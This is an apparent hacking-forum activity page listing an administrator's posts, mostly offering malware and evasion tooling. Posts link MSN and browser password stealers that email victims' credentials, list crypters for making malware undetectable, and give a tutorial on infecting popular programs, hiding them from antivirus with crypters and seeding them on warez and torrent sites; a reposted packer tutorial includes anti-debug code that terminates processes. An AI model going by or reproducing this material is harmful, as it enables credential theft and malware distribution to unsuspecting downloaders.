Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    TGS msn stealer! by SqUeEzEr It's a MSN stealer with only 8,50KB of code UNCOMPRESSED (and the settings are even crypted xD) It emails you the stored passwords of Windows Live Messenger. [usage] You have to open Builder.exe and fill in your information and press patch. Stub.exe should be in the same folder. Be sure you use a valid GMAIL account, otherwise you will get a error message. Download: http://www.2shared.com/file/7104327/4650c23/Stealer.html
  2. Nytro
    Mate sucks... Baga si tu ceva care nu are legatura cu mate. Mai e pana sa inceapa scoala.
  3. Nytro
    194.212.94.23:8000 212.113.5.2:80 212.96.165.178:3128 222.240.141.4:8080 218.56.64.210:3128 200.165.90.110:8080 201.89.168.155:8080 201.91.0.9:3128 202.116.160.89:80 202.131.94.58:808 200.74.156.108:8080 202.63.97.35:8080 210.51.184.62:80 222.124.194.228:8080 222.124.2.106:8080 222.127.147.83:8080 60.191.241.38:8088 217.150.32.86:80 61.147.120.247:8080 58.68.125.75:80 61.186.94.152:3128 81.174.70.141:32123 80.249.185.2:3128 64.94.90.22:80 67.69.254.245:80 82.145.197.249:8080 211.239.124.67:6188 97.65.164.215:8080 200.168.234.1:8080 200.168.234.10:8080 200.168.234.99:8080 203.202.255.110:8080 211.90.22.106:8088 219.150.228.182:1080 195.139.235.200:80 222.215.71.132:1080 218.56.64.210:8080 202.129.189.66:8080 203.148.85.154:8080 203.160.1.103:80 203.160.1.121:80 203.160.1.94:80 64.76.22.106:8080 64.76.22.126:8080 220.227.250.254:8080 61.178.74.39:1080 67.69.254.250:80 79.127.144.2:8080 117.102.94.190:3128 203.199.215.115:8080 118.175.15.34:8080 219.93.178.162:3128 41.196.183.58:80 201.198.34.214:8080 189.89.16.82:3128 190.144.127.202:3128 201.53.63.168:3128 218.75.100.114:8080 202.133.82.120:8080 219.101.35.83:3128 64.76.22.108:8080 67.69.254.246:80 121.12.249.207:1080 203.112.205.194:80 74.53.185.131:8080 86.101.185.98:8080 74.86.24.76:3128 74.92.229.74:8089 81.180.75.142:8080 81.208.114.227:8080 114.127.246.36:80 195.229.62.157:8080 210.5.71.130:8080 211.162.78.178:80 146.83.8.31:8080 148.75.13.143:8080 202.131.98.165:80 202.148.31.170:3126 196.213.208.150:80 202.44.4.85:8081 200.249.150.55:3128 200.41.230.105:3128
  4. Nytro
    Make your owner PE Protector Part 1: Your first EXE Protector Download source files - 128 Kb Download demo project - 100 Kb Preface This article was written to provide the better understanding to people who do not have any experience in this field. I am not going to describe about PE structure, so I think it was explained enough in Matt Pietrek's articles in MSDN. I strongly recommend to read his article before continuing to read this article if you don't have any previous experience with PE structure. You could find useful the relevant reference link at the end of article. This article will appear in three parts: Your first EXE Protector This part will describe how to make a powerful EXE protector and packer by using Visual C++ Win32 Programming. Support OCX, DLL, and SCR This part will introduce to include other PE type in additional to EXE file type. It will explain some tricks which you should know for OCX and DLL protecting. Use Cryptography API This part will demonstrate how to use Microsoft Cryptography API function to encrypt and decrypt PE section information. This article contains yoda's protector source from version 1.01 to 1.03. It is first time people can look at its source after six month of appearance on web. It is based on [6] yoda's Crypter assembly source by Danilo Bzdok and compression source from [7] UPX library by Markus F.X.J. Oberhumer & Laszlo Molnar and [9] aPLib compression library by Joergen Ibsen. Thus, we should appreciate them for helping me to create this tool. I also should be grateful to people for trying and testing it on different windows version around the world. I think this article will be a small present to all people who involve and assist to make yoda's protector. Contents Introduction A short aspect about PE Structure Open PE files Verify if PE file is valid Make Extra Section Pack and Crypt Sections Built Import Table Directory Reload Import Table and API Redirection Anti-debug methods Eliminate unnecessary data Sample code Conclusion References Introduction The Portable Executable format is standard format under Microsoft Windows NT® operating system. It contains information for code, data, resource, dynamic link libraries importation. It is modifiable by using recent powerful debuggers such as OllyDbg or SoftICE with a little knowledge about assembly language. It causes to waste time of software development companies to obtain money for their productions. Therefore, they are led to purchase the tool like EXE protector to prevent from illegal copy. My idea is what will happen if every person has owner EXE protector. Cracker person will face different EXE protector with different methods. Thus, I think every of us can have their owner EXE protector. A short aspect about PE Structure The Portable Executable includes information for the MS-DOS, the Windows NT, and Sections. This information is provided for Windows Operating System to allocate memory, import dynamic link libraries, and perform code. Table-1 MS-DOS informationIMAGE_DOS_HEADERMS-DOS Stub ProgramWindows NT informationPE Signature ("PE")IMAGE_FILE_HEADERIMAGE_OPTIONAL_HEADERSections informationIMAGE_SECTION_HEADER[0] ... IMAGE_SECTION_HEADER[n] SECTION[0] ... SECTION[n] You can find more about PE file format in [1] "Microsoft Portable Executable and Common Object File Format Specification". Matt Pietrek clarifies it enough in [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", and [3a/b] "An In-Depth Look into the Win32 Portable Executable File Format". Moreover, PEView [4] by Wayne J. Radburn will help you to find all aspects about PE file format. http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/peview.gifFigure-1 There are all requirement data structures for PE file format in included <winnt.h> file inside your Visual C++. IMAGE_DOS_HEADER, IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER structures represent all you need to work with PE file format. The relevant information for these structures could be found in [5] MSDN library. Open PE files We have to load PE file format to memory for working with its information. Some Windows API function will help us do it very easy: ''CreateFile(), GetFileSize(), GlobalAlloc(), ReadFile(), CloseHandle()''. I make a class to work with PE files. It helps me to open files and put DOS header, NT headers, Section Headers, and Sections into separate places in memory and then rebuild all as form as new PE files. class PEStructure { private: DWORD ReservedHeaderSize; DWORD ReservedHeaderRO; public: DWORD dwRO_first_section; IMAGE_DOS_HEADER image_dos_header; char *reservedheader; IMAGE_NT_HEADERS image_nt_headers; IMAGE_SECTION_HEADER image_section_header[MAX_SECTION_NUM]; char *image_section[MAX_SECTION_NUM]; void OpenFileName(char* FileName); void UpdateHeaders(BOOL bSaveAndValidate); void UpdateHeadersSections(BOOL bSaveAndValidate); void Free(); }; ''OpenFileName()'' will open PE files to place in ''image_dos_header, reservedheader, image_nt_headers, image_section_header[]'', and ''image_section[]''. All PE structures will abstract by this function in my tool. void PEStructure::OpenFileName(char* FileName) { hFile=CreateFile(FileName, GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile==INVALID_HANDLE_VALUE) { ShowErr(FileErr); return; } dwFsize=GetFileSize(hFile,0); if(dwFsize == 0) { CloseHandle(hFile); ShowErr(FsizeErr); return; } dwOutPutSize=dwFsize+IT_SIZE+DEPACKER_CODE_SIZE+ALIGN_CORRECTION; pMem=(char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,dwOutPutSize); if(pMem == NULL) { CloseHandle(hFile); ShowErr(MemErr); return; } ReadFile(hFile,pMem,dwFsize,&dwBytesRead,NULL); CloseHandle(hFile); CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderRO=sizeof(IMAGE_DOS_HEADER); ReservedHeaderSize=image_dos_header.e_lfanew-sizeof(IMAGE_DOS_HEADER); reservedheader=new TCHAR[ReservedHeaderSize]; CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); UpdateHeadersSections(TRUE); } Verify if PE file is valid It is important to verify file is a Win32 Portable Executable file by checking ''e_magic'' of ''image_dos_header'' and Signature of ''image_nt_header'' to prevent of unpredictable fault. if(PEfile.image_dos_header.e_magic!='ZM') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } if(PEfile.image_nt_headers.Signature!='EP') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } Make Extra Section There is a trick inside yoda's Protector to create extra section for protection and unpacking purposes. Visual C++ aids it to make this extra part without using of assembler compiler and linker. If you look at PE_LOADER_CODE() subroutine inside the ''CryptStuff.cpp'' you will find what I am talking about. This is same as the method that was done by Danilo Bzdok in his [6] yoda's Crypter. Of course, he did it only by using assembly language in MASM32 without any high level language. I made ''GetFunctionRVA(), GetFunctionSize()'' and CopyFunction()'' to rob code from PE_LOAD_CODE() and use it to create additional section for target PE file. DWORD GetFunctionRVA(void* FuncName) { void *_tempFuncName=FuncName; char *ptempFuncName=PCHAR(_tempFuncName); DWORD _jmpdwRVA,dwRVA; CopyMemory(&_jmpdwRVA,ptempFuncName+1,4); dwRVA=DWORD(ptempFuncName)+_jmpdwRVA+5; return(dwRVA); } DWORD GetFunctionSize(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); char* pFuncBody=PCHAR(dwRVA); UCHAR _temp; bool notEnd=TRUE; char *DepackerCodeEnd=new TCHAR[10]; DWORD l=0; do { CopyMemory(&_temp,pFuncBody+l,1); if(_temp==0xC3) { CopyMemory(DepackerCodeEnd,pFuncBody+l+0x01,10); DepackerCodeEnd[9]=0x00; if(strcmp(DepackerCodeEnd,"ETGXZKATZ")==0) { notEnd=FALSE; } } l++; }while(notEnd); return(l); } ''GetFunctionRVA()'' will seek to Relative Virtual Address of specific subroutine to use by ''GetFunctionSize()'' and ''CopyFunction()''. ''GetFunctionSize()'' will return the size of target routine to be exploited by CopyFunction(). It seeks a key word ("ETGXZKATZ") to calculate routine size. Finally, ''CopyFunction()'' is a complete routine to steal all code from PE_LOADER_CODE() subroutine to place in packed PE file. char* CopyFunction(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); DWORD dwSize=GetFunctionSize(FuncName); char* pFuncBody=PCHAR(dwRVA); char* filebuff=new TCHAR[dwSize+1]; CopyMemory(filebuff,pFuncBody,dwSize); return(filebuff); } This method can illuminate in the following code: char *pDepackerCode; DWORD DEPACKER_CODE_SIZE; : DEPACKER_CODE_SIZE=GetFunctionSize(PE_LOADER_CODE); pDepackerCode=new TCHAR[DEPACKER_CODE_SIZE]; pDepackerCode=CopyFunction(PE_LOADER_CODE); : void PE_LOADER_CODE() { _asm { //-------------------------------------------------- //---------- START OF THE PE LOADER CODE ----------- DepackerCode: : : : DepackerCodeEND: RET //"ETGXZKATZ" <<-- KEY WORD INC EBP //'E' PUSH ESP //'T' INC EDI //'G' POP EAX //'X' POP EDX //'Z' DEC EBX //'K' INC ECX //'A' PUSH ESP //'T' POP EDX //'Z' } } Pack and Crypt Sections UPX compressor source [7] code is an alternative choice to pack sections of PE files. I use [8] LZO data compression library by Markus F.X.J. Oberhumer to pack code and data section. Polymorphism encryption and decryption method [6] by Danilo Bzdok is simple and good enough to crypt PE section by some modification in C++ language as you see inside ''EncryptBuff()'' and ''DecryptBuff()'' in ''PER.CPP''. This protector separates Sections in different allocation parts of memory. Afterwards it packs and crypts part of sections by CompressPE() and CryptPE(). //------ ENCRYPT THE SECTIONS ----- // generate PER PEfile.UpdateHeadersSections(TRUE); SecEncryptBuff=new TCHAR[sEC_PER_SIZE]; SecDecryptBuff=new TCHAR[sEC_PER_SIZE]; MakePER(SecEncryptBuff,SecDecryptBuff,SEC_PER_SIZE); CopyMemory(pDepackerCode+dwRO_SEC_DECRYPT, SecDecryptBuff, SEC_PER_SIZE); // encrypt ! CompressPE(pMem); CryptPE(pMem); RemoveSectionNames(pMem); newsection.Misc.VirtualSize=DepackCodeVirtualSize+0x2000; PEfile.image_section_header[PEfile.image_nt_headers.FileHeader.NumberOfSections-1] .Misc.VirtualSize = newsection.Misc.VirtualSize; PEfile.UpdateHeadersSections(FALSE); //--------------------------------- LZO data compression library [8] has compressor source in C++ and also decompressor source in both C++ and assembly. Hence, we have all sources to pack in high level language and unpack in low level language. I used ''lzo1x_999_compress_level()'' from LZO library to compress sections inside ''CompressPE()'' and its assembly source ''lzo1f_decompress_asm_fast_safe()'' to decompress sections ''inside _DecompressPE()'' in assembly source of ''PE_LOADER_CODE()''. It is important to pay attention to image_nt_headers.OptionalHeader.SectionAlignment and image_nt_headers.OptionalHeader.FileAlignment to prevent of Win32 incompatible file error in Windows version above Windows 98. Variables in IMAGE_SECTION_HEADER should be adapted to file-alignment and section- alignment. I reserved ''UpdateHeadersSections()'' function to retrieve and rebuilt all PE file format structures. void PEStructure::UpdateHeadersSections(BOOL bSaveAndValidate) { DWORD i; if(bSaveAndValidate)//TRUE = data is being retrieved { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize = image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(reservedheader, pMem+ReservedHeaderRO, ReservedHeaderSize); } CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(&image_section_header, pMem+dwRO_first_section, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { image_section = (char*)GlobalAlloc( GMEM_FIXED | GMEM_ZEROINIT, PEAlign(image_section_header.SizeOfRawData, PEfile.image_nt_headers.OptionalHeader.FileAlignment)); CopyMemory(image_section, pMem + image_section_header.PointerToRawData, image_section_header.SizeOfRawData); } } else//FALSE = data is being initialized { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(pMem, &image_dos_header,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize=image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(pMem + ReservedHeaderRO, reservedheader, ReservedHeaderSize); } CopyMemory(pMem+image_dos_header.e_lfanew, &image_nt_headers, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(pMem+dwRO_first_section, &image_section_header, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { CopyMemory(pMem+image_section_header.PointerToRawData, image_section, image_section_header.SizeOfRawData); } } } Built Import Table Directory PE unpack section need to import two essential API functions to load dynamically all other API functions in Run-time load. LoadLibraryA() and GetProcAddress() from Kernel32.dll are vital function to import other API function with some tricky methods. AssembleIT() is reserved to undertake this task. We should change the import table address and size for turning to new import table directory inside extra section. To retrieve the old import table, it has to reload and rebuild import table directory in the next step to perform program code. Loader section use LoadLibraryA() and GetProcAddress() to seek relative virtual address of importation function of dynamic link libraries. Table-2 Import Table Address -> "Kernel32.dll", 0x00 LoadLibrary_RVA GetProcessAddres_RVA 0x00,0x00 LoadLibrary_RVA -> 0x00,0x00,"LoadLibraryA" GetProcessAddres_RVA -> 0x00,0x00,"GetProcessAddress" Reload Import Table and API Redirection It is important to protect import table directory from reverse engineering process. Danilo Bzdok has used technical methods to destroy import thunk data and crypt import information in [6] yoda's Crypter. This part is retrievable again by loader code section. I applied his methods in my PE Protector with bringing some part of code to C and remind other part in assembly. ''ProcessOrgIT()'' provide all we need to do our purpose. In loader section, ''INIT_IMPORT_TABLE()'' routine implements our point about API redirection and Import table rebuilt. Anti-debug methods PE Protector should able to detect if program debugs and prevent from debugging. OllyDbg and SoftICE are two important debuggers that can bypass many tricks which cause to halt debuggers. However, I should introduce some simple methods to detect debuggers. I know all of these methods do not have any effect in recently additional plug-ins for mentioned debuggers. 1. IsDebuggerPresent Windows API: ''IsDebuggerPresent()'' will return none zero value whenever the current process is running in the context of a debugger. 2. SoftICE detection: It can find SoftICE debugger by check if ''NTICE'' driver in windows NT and ''SICE'' driver in windows 98 are active . if(CreateFile( "\\\\.\\NTICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE NT on your system; } if(CreateFile( "\\\\.\\SICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE98 on your system; } 3. Probe Processes: Some time it needs to search for specific process or isolates to specially process. It was demonstrated how finding parent process and check if it is ''EXPLORER.EXE'' and killing all parent process except Explorer windows in sample source code. There are both C++ and assembly code inside ''CryptStuff.CPP'' to illuminate this task. void GetFileNameFromPath(char* szSource) { char *szTemp=strrchr(szSource,'\\'); if(szTemp!=NULL) { szTemp++; DWORD l=DWORD(strlen(szTemp))+1; CopyMemory(szSource,szTemp,l); } } void AntiDebug() { char lpszSystemInfo[MAX_PATH]; HANDLE hSnapshot=NULL; DWORD PID_child; DWORD PID_parent,PID_explorer; HANDLE hh_parnet = NULL; PROCESSENTRY32 pe32 = {0}; pe32.dwSize = sizeof(PROCESSENTRY32);//0x128; PID_child=GetCurrentProcessId();//getpid(); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (Process32First(hSnapshot, &pe32)) { while (Process32Next(hSnapshot, &pe32)) { GetFileNameFromPath(pe32.szExeFile); CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile)); if(strcmp(pe32.szExeFile,"EXPLORER.EXE")==0) { PID_explorer=pe32.th32ProcessID; } if(pe32.th32ProcessID==PID_child) { PID_parent=pe32.th32ParentProcessID; } } } if(PID_parent!=PID_explorer) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_parent); TerminateProcess(hh_parnet, 0); } else { MODULEENTRY32 me32 = {0}; me32.dwSize = sizeof(MODULEENTRY32); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, PID_explorer); if (Module32First(hSnapshot, &me32)) { do { if(PID_explorer==me32.th32ProcessID) { GetWindowsDirectory(lpszSystemInfo, MAX_PATH+1); strcat(lpszSystemInfo,"\\"); strcat(lpszSystemInfo,"EXPLORER.EXE"); CharUpperBuff(me32.szExePath, strlen(me32.szExePath)); if(strncmp(me32.szExePath, lpszSystemInfo, strlen(lpszSystemInfo))) { GetFileNameFromPath(me32.szExePath); if(strcmp(me32.szExePath, "EXPLORER.EXE")==0) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_explorer); TerminateProcess(hh_parnet, 0); } } } }while (Module32Next(hSnapshot, &me32)); } } } This code will not work under Windows NT 4.0 because of absence ''CreateToolhelp32Snapshot(), Process32First(), Process32Next(), Module32First(), Module32Next()''. But all of these API functions could build by undocumented API function from ''NTDLL.DLL''. You can take a look at [10] 'Windows NT (2000) Native API reference' by Gary Nebbett. Furthermore, I recommend using [11] Process Explorer by Mark Russinovich to explore all run processes in your systems. It will help to understand better them. http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/procexp.gifFigure-2 Eliminate unnecessary data Some time you need to clean all unnecessary data such as debug information, relocation section and making small DOS header and remove MS-DOS stub Program. You should reserve these items in your PE Protector with some considerations. For instance, Relocation section do not have any effect in running EXE files but it plays an important role in OLE-Active Controls and Dynamic Link Libraries. Sample code The project compiles with Visual C++ .net 2003 and doesn't require any spare tools. It works under all Windows version except Windows NT 4.0 and Windows 95. Conclusion This article and its source could be an introduction to PE protector tools and demonstrating how these tools works. I hope it covers the absence of this kind of interesting topics and tools in open source area. References [1] "Microsoft Portable Executable and Common Object File Format Specification", Microsoft Corporation, Revision 6.0, February 1999 [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", Matt Pietrek, MSDN Library, March 1994 [3a] "An In-Depth Look into the Win32 Portable Executable File Format", part 1, Matt Pietrek, MSDN Magazine, February 2002 [3b] "An In-Depth Look into the Win32 Portable Executable File Format", part 2, Matt Pietrek, MSDN Magazine, March 2002 [4] PEview Version 0.67, Wayne J. Radburn [5] MSDN Library, Microsoft Corporation, April 2003 [6] yoda's Crypter, Danilo Bzdok [7] UPX, the Ultimate Packer for eXecutables, Markus F.X.J. Oberhumer & Laszlo Molnar [8] LZO real-time data compression library, Markus F.X.J. Oberhumer [9] aPLib compression library, Joergen Ibsen [10] "Windows NT (2000) Native API reference", Gary Nebbett [11] Process Explorer, Mark Russinovich
  5. Nytro
    Steals: Firefox 3.x MSN +8.x IE 7.x Filezilla Download: http://www.2shared.com/file/7104013/2a6325a0/SeabraStealer01.html
  6. Nytro
    Repet: Nu garantez ca nu sunt infectate. De fapt chiar banuiesc ca unele sunt infectate. In plus cred ca sunt foarte slabe sanse sa gasiti ceva care sa functioneze bine.
  7. Nytro
    Sa vad ce reusesc, mai intai vreau sa termin un tutorial de care m-am apucat, dar cred ca va dura ceva. Apoi va ajut cu orice, nu e nevoie sa fiu membru, nu ma ocup cu asa ceva, dar daca va pot ajuta va ajut cu placere.
  8. Nytro
    http://bahoi.ro/?p=139
  9. Nytro
    Uploadati fisierele pe un host, setati permisiunile folderului in care se afla la 777, intrati pe pagina HTML, apasati taste la intamplare, apoi vedeti in acel folder daca s-a creat un fisier cu IP-ul vostru.
  10. Nytro

    Salutare

    Nytro replied to dRuNNNk's topic in Bine ai venit

    Daca nu vrei ban si pe acesta, uita-te la data ultimului post inainte de a posta.
  11. Nytro
    Spreading By: Beaver What Is Spreading? Spreading Is The Way Your Program/Trojan/ETC Circulates Around The Internet. This Means That People At Some Point People Spread It For. This Is Your Goal, To Put Something Out There That Is Not Wide Spread And Is Hard To Find. It Is All About Finding That Niche (A Targeted Group Of People, Like Gamers) That Want Something, But Do Not Have It Yet. When This Is Done, People Will Download It And Put It On Their Site For Download or Put It On A Torrent. Getting Started 1. Finding The Right Program This Will Be The Hardest Part. Finding Out What Is Wanted At A Certain Point In Time Is Hard. Find Out What Niche You Want To Go After, For Example If You Are Going After Gamers, But Not Just Gamers, Let’s Say Gamers That Use Steam. You Have A Couple Of Options. One Is You Can Look Around The Net That Will Focus Directly On Steam Gamers (Screen Recorders, Voice Changers, etc.). Another Is You Can Make Your Own Program; This Will Insure That There Is Nothing Else Like It, But Make Sure That The Program Is Useful And It Works. After You Think You Have Found The Right Program, Upload It To Some Warez (Media Sharing) Sites, Like Warez-BB.org And Some Torrent (Peer-To-Peer Sharing) Sites, Like ThePirateBay.org To See How Many Downloads You Can Get In A Day. If The Number Is Below 25 Try Another Program. While 25 Is Decent Number For Beginners, It Is Just Not Enough To Make A Big Impact On The Net. Stay Away From Large Programs (Over 75 MB). 2. Infecting The Program This Will Either Require Money Or Programming Knowledge. If You Choose To Infect The Program That You Found You Make Sure What Ever You Are Infecting It From Is FUD (Fully Undetectable To Anti-Virus Software). To Achieve This You Will Need A Crypter (A Program That Changes The Programs Code To Make It Look It Different When Scanned By Anti – Virus Software). You Can Either Learn To Code One Of These, Which Is The Cheaper Way, But Is Time Consuming Or You Can Buy One From Many Of The Hacking Forums Out There, Like Ukn0wn.ws. They Can Cost Anywhere From $25 To $80. After You Infect The Program Run It Through The Crpyter To Make It FUD. Where To Spread? This Is The Big Question. Knowing Where To Spread You Just Have To Go With Your Instinct, But Below You Will Find A List Of Sites And Site Types I Found Useful In My Spreading. • Warez Sites o Http://www.warez-bb.org o Http://www.Project-W.org o Bookmark Any Warez Sites You Come Across • Torrents o Http://www.ThePirateBay.org o Http://www.MiniNova.org o Http://www.Demonoid.com o Private Torrent Sites Are The Best, Because People Are Trustworthy On There • Forums (Based On Your Niche) o I Cannot Post Any Links, Because Depending On What Type Of Niche You Chose You Will Need To Find Those Types Of Forums. • Youtube o Make A Short Video, No More Than 30 Seconds That Has The Description (Read On That Below). Make Sure To Have Appropriate Music. After The Video Is Uploaded And Processed Submit The URL To Things Like StumbleUpon (Link Sharing) And Digg.com (Social News Site). What Do I Put? The Description Is Where It Makes Or Breaks Your Spreading. Make Sure You Always Use The Same Description. This Allows Easy Copy/Paste For The People That Will Post The Program Elsewhere. • Take At Least 1 Screen Shot Of The Program. Upload That To A Good Image Hosting Site, Like ww.TinyPic.com • Choose A Good File Host Where You Can Track The Number Of Downloads You Are Getting. If You Use Rapidshare.com Then Get A Legit Account. I Use Free Online Storage - File Qube, It Is Free And It Tracks Page Views and Downloads, And It Accepts A Lot Of File Types. • Write Out A Well Thought Out Description That Talks About How The Program Works, What The Features Are, ETC. • When Your Infected Is FUD, Upload It To NoVirusThanks - Free Online Virus & Malware Scan Service Making Sure To Check “Do Not Distribute The Sample”. This Site Scans Your File With All Of The Major Anti – Virus Software. That Check Box Makes Sure They Do Not Send Their Findings To The Anti- Virus Companies, This Means Your Program Will Stay FUD Longer. After It Is Done Grab The BB Code And HTML Code. • Keep Your Descriptions For Later Use. Keep The Description, One For Forums/Warez Sites That Has The NoVirusThanks BB Code, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s) And One For Sites That Don’t Use BB Code, That Has The HTML Code From NoVirusThanks, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s). Syndication Syndication Means That Others That Have Downloaded Your Program Are Posting It On Other Sites For You. This Means That Your Spreading Has Been A Major Success And You Should Be Happy. This Means You Do Not Have To Try As Hard To Get Download, Because Others Are Doing The Spreading For You. This Has Been A Beaver Tutorial. If You Want To Post This On Other Site Please Leave The Following. Written By Beaver For… http://www.Beaver.WS uNkn0wn.ws - Index page
  12. Nytro
    RAR 1 01 - DarkAvengard Crypter (Open source Code Crypter > p0ke >> Moded) 02 - h4ck-y0u.org crypter by DuSTY 03 - L0rD Crypter by haZl0oh 04 - AT4RE aSm Protecter 1.0 by Mouradpr 05 - AverCryptor 1.02 beta by os1r1s 06 - Cryptic 2.1 by Tughack 07 - Crew Crypter by North-Team 08 - Mortal Team Crypter 2.0 by Ras 09 - NOmeR1 by NOmeR1 and P.S. 10 - Poly! Crypt 2.8 by BUNG 11 - PowerCrypt 2.0 by N47RON 12 - Private Krypt 1.0 beta by t0pP8uZz 13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer 14 - Russian Cryptor 1.0 by master3 15 - SimbiOZ 2.1 by Extranger 16 - Snoop Crypt by snoop 17 - Zelda Crypt by snoop 18 - WinOfCrypt 1.0 by DarkPressure 19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek 20 - X-Crypter 1.2 Private Version by x-zer0 RAR 2 01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source) 02 - Crypter v.3.1 by SLESH 2007 (Delphi source) 03 - FFC v.1.6 Public by Juza 04 - File Crypter Pro by Aphex (Delphi source) 05 - GKrpto v.1.0 by User-99 06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source) 07 - Open source file crypter (ass crypter) by assoftware (Delphi source) 08 - Pecrypt by archphase (Delphi source) 09 - Pscrambler v.1.2 by p0ke (Delphi source) 10 - Smokes Crypter v1.2 (Delphi source) 11 - Cigicigi File Crypter v1.0 by turkojan 12 - iPBProtect v0.1.5 beta [****] by Forgat 13 - MaskPE v.2.0 by yzkzero 14 - PEncrypt v.4.0 by JunkCode 15 - Perplex v.1.01dev by BliZZaRD 16 - SkD Undetectabler 2.0beta by skdrat 17 - ExeSax v.0.9.1 GUI 18 - VB-PE-Crypt 1.0 by Flo 19 - UnderGround Crypter v.1.0 by Booster2ooo 20 - Daemon Crypt v.2 Public by Evil_Inside RAR 3 01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC 02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC 03 - Vbsencrypter v.0.01 by K 04 - File Crypter by valdir_salguei ro (from brasil - source code included) 05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d 06 - iNF[CRYPT] by LESHIY & [nht] 07 - CryptoFilez v.2.0 by Mr.Ded 08 - Morphnah Beta2 by pyccxak.com Kas 09 - Pohernah v.1.0.2 by pyccxak.com Kas 10 - Pohernah v.1.0.3 by pyccxak.com Kas 11 - RPolyCrypt v.1.0b by Vasca 12 - StrAnGe CrYpTeR by TiPiaX (source code included) 13 - DalKrypt v1.0 by DalKiT (source code included) 14 - fEaRz Crypter v.1.0 beta1 by fEaRz 15 - Icrypt v.1.0 by BuGGz 16 - Minke v.1.0.1 by Codius 17 - Scramble Tool v0.2.3b By System33r (k0nsl) 18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1 19 - NoodleCrypt 2 by NoodleSpa 20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas All: Download: http://rs222.rapidshare.com/files/94316443/PackCrypters.rar
  13. Nytro
    Ma mai gandesc. Cum ar fi daca in loc sa posteze cineva un program ar scrie: "Daca il vrea cineva sa imi dea add la plm_hackeru" sau ceva de genul? In fine, asta voi decide in functie de situatie.
  14. Nytro
    Detalii? Spammer pe messenger? Sa trimita multe mesaje, sau sa te loghezi si sa dea mass, ceva de genul? Sau un fel de booter?
  15. Nytro
    Ok guys im sure some people will agree with me here.These 3 tuts are by far the best i have ever seen on how to make whatever it is your trying ud undetected by quite a few av's. If you combine these techniques and learn how to do them correctly you could possibly make a program near fud or fud. Anyways these 3 tuts helped me allot and i thought id share them They also explain to you what to do very clearly and have links to the tools you need and also have pictures showing you what to do. So it isn't just any nooby tuts its professional ones The credits are at the beginning of the tuts when you open them. Please note that if anyone needs help with any of the tuts or don't understand some bits please just post it up and il get back to you as soon as possible Credits to Icarus Download: http://www.2shared.com/file/7090483/b58610b6/Pack.html
  16. Nytro
